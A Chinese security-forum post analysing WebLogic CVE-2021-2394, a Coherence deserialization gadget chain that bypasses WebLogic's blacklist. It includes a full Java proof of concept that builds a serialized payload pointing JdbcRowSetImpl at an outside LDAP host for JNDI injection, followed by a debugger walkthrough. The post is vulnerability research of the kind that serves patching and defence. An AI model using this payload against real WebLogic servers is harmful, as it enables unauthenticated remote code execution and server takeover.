安全矩阵

 找回密码
 立即注册
搜索
查看: 2406|回复: 0

weblogic漏洞分析之CVE-2021-2394

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-10-26 10:03:25 | 显示全部楼层 |阅读模式
原文链接:weblogic漏洞分析之CVE-2021-2394

简介Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。
这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。
影响版本:Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
前置知识为了更好的理解漏洞,我将介绍漏洞中涉及的每一个类的作用,再将所有类串起来形成调用链
ExternalizableLite接口Coherence 组件中存在一个 com.tangosol.io.ExternalizableLite,它继承了 java.io.Serializable,另外声明了 readExternal 和 writeExternal 这两个方法。

ExternalizableHelper类ExternalizableHelper类可以将实现上面ExternalizableLite接口的类进行序列化和反序列化操作,在反序列化操作中,会调用ExternalizableHelper#readObject

如上图,在ExternalizableHelper#readObject中,会调用readObjectInternal方法,此方法会根据要还原类的类型,选择对应的方法进行解析,对于实现 com.tangosol.io.ExternalizableLite 接口的对象,会进入到 readExternalizableLite 方法:

在readExternalizableLite 方法中,会根据类名加载类,然后并且实例化出这个类的对象,然后调用它的 readExternal() 方法。

JdbcRowSetImpl类此类中getDatabaseMetaData方法会调用this.connect

而this.connect则调用了InitialContext#lookup,如果this.getDataSourceName()为恶意uri,则可以产生JNDI注入

MethodAttributeAccessor类此类中有一个getAttributeValueFromObject方法,在getAttributeValueFromObject方法中,可以调用invoke来执行任意方法,前提是三个参数可控getMethod、anObject、parameters

AbstractExtractor类此类的compare方法会调用this.extract

FilterExtractor类此类是整个漏洞绕过上一个补丁的关键类,它实现了ExternalizableLite接口,并且父类是AbstractExtractor

在此类中有两个比较重要的方法,首先来看第一个extract方法,此方法会调用attributeAccessor的getAttributeValueFromObject方法

第二个是readExternal方法

此方法调用了SerializationHelper#readAttributeAccessor来从序列化数据中还原this.attributeAccessor的值
跟进readAttributeAccessor方法,可以看到是自己new了一个MethodAttributeAccessor对象,这里就是绕过补丁的关键

TopNAggregator$PartialResult类TopNAggregator$PartialResult是一个静态内部类,也实现了ExternalizableLite接口,里面有个readExternal方法

在readExternal方法中也是调用的ExternalizableHelper进行还原每一个元素,170行还原了m_comparator后,到172行调用了instantiateInternalMap方法并且传入了还原的m_comparator,跟进instantiateInternalMap

这里首先new了一个SortedBag.WrapperComparator,传入comparator,跟进WrapperComparator可以看到把comparator的值赋予给了this.f_comparator

之后把new出来的SortedBag.WrapperComparator对象传入了TreeMap构造方法,跟进TreeMap构造方法

在TreeMap构造方法只是对comparator的一个赋值,把刚刚的SortedBag.WrapperComparator对象传递给了this.comparator

回到TopNAggregator$PartialResult类,最终的把TreeMap对象赋值给了this.m_map,接下来看176行的this.add

跟进add方法看到调用了父类的add

跟进其父类SortedBag类的add,在父类add方法中,调用了map.put,而这里的map就是上面的TreeMap对象

TreeMap类在TreeMap类中,其put方法会调用compare

在compare中调用了comparator.compare,此处的comparator是在上个内部类中赋予的值SortedBag.WrapperComparator类

SortedBag$WrapperComparator类此类的compare方法会调用this.f_comparator.compare

AttributeHolder类这个是整个漏洞的入口,在此类中实现了readExternal方法,在还原this.m_oValue值时候会调用ExternalizableHelper.readObject

漏洞分析​​
先上gadget:
  1. AttributeHolder#readExternal
  2. ExternalizableHelper#readObject
  3.   ExternalizableHelper#readExternalizableLite
  4.    TopNAggregator$PartialResult#readExternal
  5.     TopNAggregator$PartialResult#add
  6.      SortedBag#add
  7.       TreeMap#put
  8.        SortedBag$WrapperComparator#compare
  9.         FilterExtractor#compare
  10.          FilterExtractor#extract
  11.           MethodAttributeAccessor#getAttributeValueFromObject
  12.            Method.invoke
  13.             JdbcRowSetImpl#getDatabaseMetaData
  14.              InitialContext#lookup
复制代码


POC用Timeline Sec团队的:

  1. import com.sun.rowset.JdbcRowSetImpl;
  2. import com.supeream.serial.Serializables;
  3. import com.tangosol.coherence.servlet.AttributeHolder;
  4. import com.tangosol.util.SortedBag;
  5. import com.tangosol.util.aggregator.TopNAggregator;
  6. import oracle.eclipselink.coherence.integrated.internal.querying.FilterExtractor;
  7. import org.eclipse.persistence.exceptions.DescriptorException;
  8. import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
  9. import org.eclipse.persistence.mappings.AttributeAccessor;

  10. import java.io.*;
  11. import java.lang.reflect.Constructor;
  12. import java.lang.reflect.Field;
  13. import java.lang.reflect.Method;

  14. public class test {
  15.     public static void main(String[] args) throws Exception {
  16.         String ldapurl="ldap://192.168.202.1:1389/2rp7lc";

  17.         MethodAttributeAccessor accessor = new MethodAttributeAccessor();
  18.         accessor.setAttributeName("yangyang");
  19.         accessor.setGetMethodName("connect");
  20.         accessor.setSetMethodName("setConnection");

  21.         Constructor<JdbcRowSetImpl> DeclaredConstructor = JdbcRowSetImpl.class.getDeclaredConstructor();
  22.         DeclaredConstructor.setAccessible(true);
  23.         JdbcRowSetImpl jdbcRowSet = DeclaredConstructor.newInstance();

  24.         jdbcRowSet.setDataSourceName(ldapurl);

  25.         FilterExtractor extractor = new FilterExtractor(accessor);
  26.         FilterExtractor extractor1 = new FilterExtractor(new TLSAttributeAccessor());

  27.         SortedBag sortedBag = new TopNAggregator.PartialResult(extractor1, 2);
  28.         sortedBag.add(jdbcRowSet);

  29.         Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField("m_comparator");
  30.         m_comparator.setAccessible(true);
  31.         m_comparator.set(sortedBag, extractor);

  32.         AttributeHolder attributeHolder = new AttributeHolder();

  33.         Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class);
  34.         setInternalValue.setAccessible(true);
  35.         setInternalValue.invoke(attributeHolder, sortedBag);

  36.         //serial
  37.         ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("poc.ser"));
  38.         objectOutputStream.writeObject(attributeHolder);
  39.         objectOutputStream.close();

  40.         //unserial
  41.         ObjectInputStream objectIntputStream = new ObjectInputStream(new FileInputStream("poc.ser"));
  42.         objectIntputStream.readObject();
  43.         objectIntputStream.close();
  44.     }
  45.     public static class TLSAttributeAccessor extends AttributeAccessor {

  46.         public Object getAttributeValueFromObject(Object o) throws DescriptorException {
  47.             return this.attributeName;
  48.         }

  49.         public void setAttributeValueInObject(Object o, Object o1) throws DescriptorException {
  50.             this.attributeName = "yangyang";
  51.         }
  52.     }
  53. }
复制代码


在objectIntputStream.readObject();处下断点

跟进到AttributeHolder#readExternal,这里使用了ExternalizableHelper从序列化数据中还原this.m_oValue

跟进ExternalizableHelper#readObject,调用了readObjectInternal

在readObjectInternal中,判断nType的值,进入readExternalizableLite来处理

在readExternalizableLite中,先实例化了TopNAggregator$PartialResult类,然后调用了它的readExternal方法

跟进到TopNAggregator$PartialResult的readExternal方法,开始依次还原几个变量,先看还原第一个m_comparator

跟进ExternalizableHelper#readObject到readExternalizableLite方法,实例化出了FilterExtractor对象,调用其readExternal方法

跟进FilterExtractor#readExternal方法,发现调用了SerializationHelper.readAttributeAccessor方法来还原this.attributeAccessor的值

跟进SerializationHelper.readAttributeAccessor后,可以看到会 new 一个 MethodAttributeAccessor 对象,然后从 DataInput 中还原它的 setAttributeName,setGetMethodName 以及 setSetMethodName 属性,最后进行返回。

回到TopNAggregator$PartialResult的readExternal方法中,此时this.m_comparator已经变成了FilterExtractor对象

接着调用到172行的instantiateInternalMap方法,传入了this.m_comparator

在instantiateInternalMap方法中,首先new了一个SortedBag.WrapperComparator,传入comparator,跟进WrapperComparator可以看到把comparator的值赋予给了this.f_comparator

之后把new出来的SortedBag.WrapperComparator对象传入了TreeMap构造方法,跟进TreeMap构造方法

在TreeMap构造方法只是对comparator的一个赋值,把刚刚的SortedBag.WrapperComparator对象传递给了this.comparator

回到TopNAggregator$PartialResult类,最终的把TreeMap对象赋值给了this.m_map,接下来看176行的this.add

跟进add方法看到调用了父类的add,可以看到value的值已经变成了JdbcRowSetImpl


跟进其父类SortedBag类的add,在父类add方法中,调用了map.put,而这里的map就是上面的TreeMap对象

在TreeMap类中,其put方法会调用compare,此时传入的key就是JdbcRowSetImpl对象

在compare中调用了comparator.compare,此处的comparator是在上面TreeMap中赋予的SortedBag.WrapperComparator类

接着进入SortedBag.WrapperComparator#compare中,可以看到调用了FilterExtractor#compare,其中o1、o2的值为JdbcRowSetImpl

跟进FilterExtractor#compare中,调用了this.extract

转到this.extract,调用了MethodAttributeAccessor#getAttributeValueFromObject

查看MethodAttributeAccessor#getAttributeValueFromObject

利用invoke调用了JdbcRowSetImpl#getDatabaseMetaData

最终进行了lookup,其this.getDataSourceName()就是我们输入的LDAP地址

弹出计算器




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-22 22:18 , Processed in 0.018042 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表